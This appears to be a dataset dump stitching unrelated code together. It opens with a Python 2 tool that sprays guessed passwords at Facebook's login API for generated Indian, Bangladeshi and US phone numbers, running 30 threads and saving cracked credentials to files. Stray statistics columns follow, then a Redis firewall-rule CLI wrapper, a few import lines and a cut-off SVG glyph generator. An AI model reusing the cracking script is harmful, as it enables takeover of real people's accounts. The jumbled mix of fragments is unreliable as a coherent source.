hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
print("Useful Codes : 755 855 935 965 975 995")
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN India ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/india.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/india.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def bangladesh():
os.system("clear")
print banner
print
print "Useful Codes : 191 To 199"
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN Bangladesh ####
def main(arg):
global checkpoint,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/bang.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/bangla.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
else:
pass2 = 'allah786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass2+"\n")
oka.close()
oks.append(user+pass2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass2
cps = open('save/bang.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass2+"\n")
cps.close()
checkpoint.append(user+pass2)
else:
pass3 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass3+"\n")
oka.close()
oks.append(user+pass3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass3
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
cps.close()
checkpoint.append(user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def usa():
os.system("clear")
print banner
print
print("Search On Google For USA Area Codes")
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN India ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/india.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/india.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
if __name__ == '__main__':
crack_no()
| 35.139319
| 321
| 0.606123
| 3,447
| 22,700
| 4.006963
| 0.092254
| 0.041703
| 0.03649
| 0.034752
| 0.872719
| 0.870765
| 0.863814
| 0.858167
| 0.855922
| 0.84832
| 0
| 0.118678
| 0.175198
| 22,700
| 645
| 322
| 35.193798
| 0.608556
| 0.009692
| 0
| 0.83101
| 0
| 0.095819
| 0.453085
| 0.198233
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.191638
| 0.015679
| null | null | 0.146341
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
0f99978ee90db509ec39497573c966255046d7b8
| 2,187
|
py
|
Python
|
pyaz/redis/firewall_rules/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/redis/firewall_rules/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/redis/firewall_rules/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
from ... pyaz_utils import _call_az
def create(end_ip, name, resource_group, rule_name, start_ip):
'''
Create a redis cache firewall rule.
Required Parameters:
- end_ip -- Highest IP address included in the range.
- name -- Name of the Redis cache.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- rule_name -- The name of the firewall rule.
- start_ip -- Lowest IP address included in the range.
'''
return _call_az("az redis firewall-rules create", locals())
def update(end_ip, name, resource_group, rule_name, start_ip):
'''
Update a redis cache firewall rule.
Required Parameters:
- end_ip -- Highest IP address included in the range.
- name -- Name of the Redis cache.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- rule_name -- The name of the firewall rule.
- start_ip -- Lowest IP address included in the range.
'''
return _call_az("az redis firewall-rules update", locals())
def delete(name, resource_group, rule_name):
'''
Required Parameters:
- name -- Name of the Redis cache.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- rule_name -- The name of the firewall rule.
'''
return _call_az("az redis firewall-rules delete", locals())
def show(name, resource_group, rule_name):
'''
Required Parameters:
- name -- Name of the Redis cache.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- rule_name -- The name of the firewall rule.
'''
return _call_az("az redis firewall-rules show", locals())
def list(name, resource_group):
'''
Required Parameters:
- name -- Name of the Redis cache.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az redis firewall-rules list", locals())
| 33.646154
| 128
| 0.67947
| 302
| 2,187
| 4.791391
| 0.139073
| 0.134762
| 0.055978
| 0.044921
| 0.895646
| 0.895646
| 0.895646
| 0.873531
| 0.873531
| 0.822391
| 0
| 0
| 0.222222
| 2,187
| 64
| 129
| 34.171875
| 0.850676
| 0.631001
| 0
| 0
| 0
| 0
| 0.231013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
0fa5efe0ce4420f47cf3810bdaaa9408001fa882
| 178
|
py
|
Python
|
topside/procedures/__init__.py
|
roguextech/Waterloo-Rocketry-topside
|
345e7d47efdac04c2c5f70d55f83bd77acdbb511
|
[
"MIT"
] | 4
|
2020-04-18T00:40:55.000Z
|
2021-06-10T04:04:09.000Z
|
topside/procedures/__init__.py
|
roguextech/Waterloo-Rocketry-topside
|
345e7d47efdac04c2c5f70d55f83bd77acdbb511
|
[
"MIT"
] | 82
|
2020-04-15T21:26:04.000Z
|
2022-02-04T04:50:07.000Z
|
topside/procedures/__init__.py
|
roguextech/Waterloo-Rocketry-topside
|
345e7d47efdac04c2c5f70d55f83bd77acdbb511
|
[
"MIT"
] | 8
|
2020-04-21T17:54:36.000Z
|
2022-02-28T16:14:21.000Z
|
from topside.procedures.conditions import *
from topside.procedures.procedures_engine import *
from topside.procedures.procedure import *
from topside.procedures import proclang
| 35.6
| 50
| 0.853933
| 21
| 178
| 7.190476
| 0.380952
| 0.291391
| 0.556291
| 0.536424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 178
| 4
| 51
| 44.5
| 0.932099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
0fc988175a24c5cf9c33f019e21371c7218bf72d
| 85,579
|
py
|
Python
|
scripts/make_svg_files.py
|
jamesscottbrown/parametric-sbolv-1
|
5638c2a30fc9bf14a5616cb18ba7dc3473b7e30f
|
[
"MIT"
] | null | null | null |
scripts/make_svg_files.py
|
jamesscottbrown/parametric-sbolv-1
|
5638c2a30fc9bf14a5616cb18ba7dc3473b7e30f
|
[
"MIT"
] | null | null | null |
scripts/make_svg_files.py
|
jamesscottbrown/parametric-sbolv-1
|
5638c2a30fc9bf14a5616cb18ba7dc3473b7e30f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
################################################################################
# Author: Thomas Gorochowski, Biocompute Lab <tom@chofski.co.uk>
# Last Updated: 10/03/2020
################################################################################
# All drawing is done in SVG frame of reference so (0, 0) is top left increasing
# downwards and to right). This will make it SVG compliant, but some
# manipulation in Python is required for other tools like DNAplotlib to use
# these where bottom left is (0, 0).
################################################################################
import re
import math
# Default width for SVG file
svg_width = 100
svg_height = 100
# Default baseline start position
baseline_x = 0
baseline_y = 0
# Standard styling used for major component types
style_text = {}
style_text['bounding-box'] = 'fill:none;stroke:rgb(150,150,150);stroke-opacity:0.5;stroke-width:1pt;stroke-linecap:butt;stroke-linejoin:miter;stroke-dasharray:1.5,0.8'
style_text['baseline'] = 'fill:none;stroke:black;stroke-width:1pt'
style_text['unfilled-path'] = 'fill:none;stroke:black;stroke-width:1pt;stroke-linejoin:round;stroke-linecap:round'
style_text['filled-path'] = 'fill:rgb(230,230,230);fill-rule:nonzero;stroke:black;stroke-width:1pt;stroke-linejoin:miter;stroke-linecap:butt'
style_text['filled-background-path'] = 'fill:rgb(255,255,255);fill-rule:nonzero;stroke:none'
def params_to_text (parametric_defaults):
param_text = []
for k in sorted(parametric_defaults.keys()):
param_text.append(k + '=' + str(parametric_defaults[k]))
return ';'.join(param_text)
def eval_parameterised_path(parameterised_path_text, params):
# Use regular expression to extract and then replace with evaluated version
# https://stackoverflow.com/questions/38734335/python-regex-replace-bracketed-text-with-contents-of-brackets
path_text = re.sub(r"{([^{}]+)}", lambda m: str(eval(m.group()[1:-1], params)), parameterised_path_text)
return path_text
def svg_header (glyphtype, soterms, parametric_defaults={}, width=100, height=100):
parametric_defaults_text = params_to_text(parametric_defaults)
output = ''
output += '<svg version="1.1"\n'
output += ' xmlns="http://www.w3.org/2000/svg"\n'
output += ' xmlns:parametric="//parametric-svg.js.org/v1"\n'
output += ' width="' + str(width) + '"\n'
output += ' height="' + str(height) + '"\n'
output += ' glyphtype="' + glyphtype + '"\n'
output += ' soterms="' + soterms + '"\n'
output += ' parametric:defaults="' + parametric_defaults_text + '">\n'
return output
def bounding_box (x, y, width, height, params, style=style_text['bounding-box']):
if INCLUDE_BOUNDING_BOX:
output = ''
output += '\n<rect class="bounding-box"\n'
output += ' id="bounding-box"\n'
output += ' parametric:x="' + x + '"\n'
output += ' x="' + eval_parameterised_path(x, params) + '"\n'
output += ' parametric:y="' + y + '"\n'
output += ' y="' + eval_parameterised_path(y, params) + '"\n'
output += ' parametric:width="' + width + '"\n'
output += ' width="' + eval_parameterised_path(width, params) + '"\n'
output += ' parametric:height="' + height + '"\n'
output += ' height="' + eval_parameterised_path(height, params) + '"\n'
output += ' style="' + style + '"/>\n\n'
return output
else:
return ''
def baseline (x, y, width, params, style=style_text['baseline']):
if INCLUDE_BASELINE:
svg_str = 'M{x},{y+(height/2)} L{x+width},{y+(height/2)}'
output = ''
output += '<path class="baseline"\n'
output += ' id="baseline"\n'
output += ' parametric:d="' + svg_str + '"\n'
output += ' d="' + eval_parameterised_path(svg_str, params) + '"\n'
output += ' parametric:y="' + '{y+(height/2)}' + '"\n'
output += ' style="' + style + '"/>\n'
return output
else:
return ''
def write_glyph_svg (filename, header_text, glyph_paths):
f_out = open(filename, 'w')
f_out.write(header_text + '\n')
for i in range(len(glyph_paths)):
cur_path = glyph_paths[i]
f_out.write('<path ')
x = 0
for k in cur_path.keys():
el = cur_path[k]
if x > 0:
f_out.write("\n ")
x += 1
f_out.write(k + '="' + cur_path[k] + '" ')
f_out.write('/>\n\n')
f_out.write('</svg>')
f_out.close()
###############################################################################
# Functions to create list of elements for each glyph
###############################################################################
def rbs_svg ():
params = {}
# General parameters
params['x'] = 0
params['y'] = 0
params['width'] = 26
params['height'] = 60
params['pad_left'] = 0
params['pad_right'] = 0
params['pad_top'] = 0
params['pad_bottom'] = 0
# RBS specific parameters
params['glyph_pad_top'] = 12
#params['glyph_pad_bottom'] = 30
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('RibosomeEntrySite', 'SO:0000139', parametric_defaults=params, width=params['width'], height=params['height'])
header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
rbs_path = {}
rbs_path['class'] = 'filled-path'
rbs_path['id'] = 'rbs'
rbs_path['parametric:d'] = 'M{(x+pad_left)},{y+(height/2)} C{(x+pad_left)},{(y+pad_top)+glyph_pad_top} {x+width-pad_right},{(y+pad_top)+glyph_pad_top} {x+width-pad_right},{y+(height/2)} Z'
#L{baseline_x+pad_before},{(baseline_y-baseline_offset)}
rbs_path['d'] = eval_parameterised_path(rbs_path['parametric:d'], params)
rbs_path['style'] = style_text['filled-path']
glyph_paths.append(rbs_path)
return header_text, glyph_paths
def promoter_svg ():
params = {}
# General parameters
params['x'] = 0
params['y'] = 0
params['width'] = 25
params['height'] = 60
params['pad_left'] = 0
params['pad_right'] = 0
params['pad_top'] = 0
# Promoter specific parameters
params['glyph_pad_top'] = 0
params['glyph_arrowhead_height'] = 5
params['glyph_arrowhead_width'] = 5
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Promoter', 'SO:0000167', parametric_defaults=params, width=params['width'], height=params['height'])
header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
promoter_body_path = {}
promoter_body_path['class'] = 'unfilled-path'
promoter_body_path['id'] = 'promoter-body'
promoter_body_path['parametric:d'] = 'M{x+pad_left},{y+(height/2)} L{x+pad_left},{y+pad_top+glyph_pad_top+glyph_arrowhead_height} L{x+width-pad_right},{y+pad_top+glyph_pad_top+glyph_arrowhead_height}'
promoter_body_path['d'] = eval_parameterised_path(promoter_body_path['parametric:d'], params)
promoter_body_path['style'] = style_text['unfilled-path']
glyph_paths.append(promoter_body_path)
promoter_head_path = {}
promoter_head_path['class'] = 'unfilled-path'
promoter_head_path['id'] = 'promoter-head'
promoter_head_path['parametric:d'] = 'M{x+width-pad_right-glyph_arrowhead_width},{y+pad_top+glyph_pad_top} L{x+width-pad_right},{y+pad_top+glyph_pad_top+glyph_arrowhead_height} L{x+width-pad_right-glyph_arrowhead_width},{y+pad_top+glyph_pad_top+(glyph_arrowhead_height*2)}'
promoter_head_path['d'] = eval_parameterised_path(promoter_head_path['parametric:d'], params)
promoter_head_path['style'] = style_text['unfilled-path']
glyph_paths.append(promoter_head_path)
return header_text, glyph_paths
def terminator_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['x'] = 0
params['y'] = 0
params['width'] = 16
params['height'] = 60
params['pad_left'] = 0
params['pad_right'] = 0
params['pad_top'] = 0
# Promoter specific parameters
params['glyph_pad_top'] = 12
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Terminator', 'SO:0000141', parametric_defaults=params, width=params['width'], height=params['height'])
header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
terminator_body_path = {}
terminator_body_path['class'] = 'unfilled-path'
terminator_body_path['id'] = 'terminator-body'
terminator_body_path['parametric:d'] = 'M{x+pad_left+((width-x-pad_left-pad_right)/2)},{y+(height/2)} L{x+pad_left+((width-x-pad_left-pad_right)/2)},{y+pad_top+glyph_pad_top}'
terminator_body_path['d'] = eval_parameterised_path(terminator_body_path['parametric:d'], params)
terminator_body_path['style'] = style_text['unfilled-path']
glyph_paths.append(terminator_body_path)
terminator_head_path = {}
terminator_head_path['class'] = 'unfilled-path'
terminator_head_path['id'] = 'terminator-head'
terminator_head_path['parametric:d'] = 'M{x+pad_left},{y+(pad_top+glyph_pad_top)} L{x+width-pad_right},{y+pad_top+glyph_pad_top}'
terminator_head_path['d'] = eval_parameterised_path(terminator_head_path['parametric:d'], params)
terminator_head_path['style'] = style_text['unfilled-path']
glyph_paths.append(terminator_head_path)
return header_text, glyph_paths
def cds_svg ():
params = {}
# General parameters
params['x'] = 0
params['y'] = 0
params['width'] = 60
params['height'] = 60
params['pad_left'] = 0
params['pad_right'] = 0
params['pad_top'] = 0
params['pad_bottom'] = 0
# CDS specific parameters
params['glyph_pad_top'] = 16
params['glyph_pad_bottom'] = 16
params['glyph_arrowhead_length'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('CDS', 'SO:0000316', parametric_defaults=params, width=params['width'], height=params['height'])
header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
cds_path = {}
cds_path['class'] = 'filled-path'
cds_path['id'] = 'cds'
cds_path['parametric:d'] = 'M{(x+pad_left)},{(y+pad_top)+glyph_pad_top} L{(x+width-pad_right)-glyph_arrowhead_length},{(y+pad_top)+glyph_pad_top} L{(x+width-pad_right)},{(y+pad_top)+((height-pad_top-pad_bottom)/2)} L{(x+width-pad_right)-glyph_arrowhead_length},{(y+height-pad_bottom)-glyph_pad_bottom} L{(x+pad_left)},{(y+height-pad_bottom)-glyph_pad_bottom} Z'
cds_path['d'] = eval_parameterised_path(cds_path['parametric:d'], params)
cds_path['style'] = style_text['filled-path']
glyph_paths.append(cds_path)
return header_text, glyph_paths
def primer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 3
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Primer specific parameters
params['arrowbody_width'] = 10
params['arrowhead_width'] = 3
params['arrowhead_height'] = 3
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('PrimerBindingSite', 'SO:0005850', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-arrowhead_height-pad_top}', '{pad_before+arrowbody_width+pad_after}', '{pad_top+arrowhead_height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+arrowbody_width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
primer_path = {}
primer_path['class'] = 'unfilled-path'
primer_path['id'] = 'primer-binding-site'
primer_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+arrowbody_width},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+arrowbody_width-arrowhead_width},{(baseline_y-baseline_offset)-arrowhead_height}'
primer_path['d'] = eval_parameterised_path(primer_path['parametric:d'], params)
primer_path['style'] = style_text['unfilled-path']
glyph_paths.append(primer_path)
return header_text, glyph_paths
def origin_of_replication_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Promoter specific parameters
params['width'] = 20
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('OriginOfReplication', 'SO:0000296', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width/2.0)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
ori_path = {}
ori_path['class'] = 'filled-path'
ori_path['id'] = 'origin-of-replication'
ori_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)} C{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'
ori_path['d'] = eval_parameterised_path(ori_path['parametric:d'], params)
ori_path['style'] = style_text['filled-path']
glyph_paths.append(ori_path)
return header_text, glyph_paths
def unspecified_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Unspecified', 'SO:0000110', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width/2.0)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
unspecified_path = {}
unspecified_path['class'] = 'filled-path'
unspecified_path['id'] = 'unspecified-boundry'
unspecified_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width/2.0)},{(baseline_y-baseline_offset)-(width/2.0)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width/2.0)},{(baseline_y-baseline_offset)+(width/2.0)} Z'
unspecified_path['d'] = eval_parameterised_path(unspecified_path['parametric:d'], params)
unspecified_path['style'] = style_text['filled-path']
glyph_paths.append(unspecified_path)
question_path = {}
question_path['class'] = 'unfilled-path'
question_path['id'] = 'unspecified-question-mark'
